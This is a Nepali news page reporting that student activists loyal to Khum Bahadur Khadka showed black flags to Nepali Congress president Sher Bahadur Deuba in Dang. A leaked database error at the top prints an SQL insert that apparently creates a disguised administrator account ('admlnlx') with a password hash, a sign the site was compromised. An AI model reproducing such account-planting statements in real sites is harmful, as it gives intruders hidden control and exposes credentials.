WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdqz0lgZFEMPExT959zNODSg0oG6uh.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 00:58:59', '', 'admlnlx', 'admlnlx')
दाङ, माघ १३ –
नेपाली काँग्रेसका नेता खुमबहादुर खड्का पक्षधर कार्यकर्ताले आफ्नै पार्टी सभापति शेरबहाुदर देउवालाई कालो झण्डा देखाएका छन् ।माघी महोत्सवलाई सम्बोधन गर्न दाङ पगेका सभापति देउवालाई नेपाल विद्यार्थी संघका कार्यकताहरुले कालोझण्डा देखाएका हुन् ।
नेविसंघका जिल्ला सदस्य अरुण लहरेले हेकुलीको चखौरामा हिजोदेखि सुरु भएको माघी महोत्सवलाई सम्बोधन गर्ने क्रममा कालो झन्डा देखाइएको जानकारी दिए ।कार्यक्रमस्थल पुगेका दुई दर्जन युवाहरुको समूहले कालो झण्डा देखाउँदै देउवा विरुद्ध नाराबाजी गरेका थिए । उनीहरुले ‘खुमबहादुर जिन्दावाद, धोखेबाज देउवा मुर्दाबाद’ भन्दै नारा लगाएका थिए ।
देउवाले खुमबहादुर खड्कालाई बचन दिएअनुसार उपसभापतिमा मनोनयन नगरेकोले कालो झन्डा देखाएको उनीहरुले बताएका छन् ।यता प्रहरीले भने कार्यस्थलमा होहल्ला गरेपछि खुमबहादुरका समर्थकलाई बाहिर निकालेको थियो र देउवा पनि भाषण छोट्टयाएर हिडेका थिए ।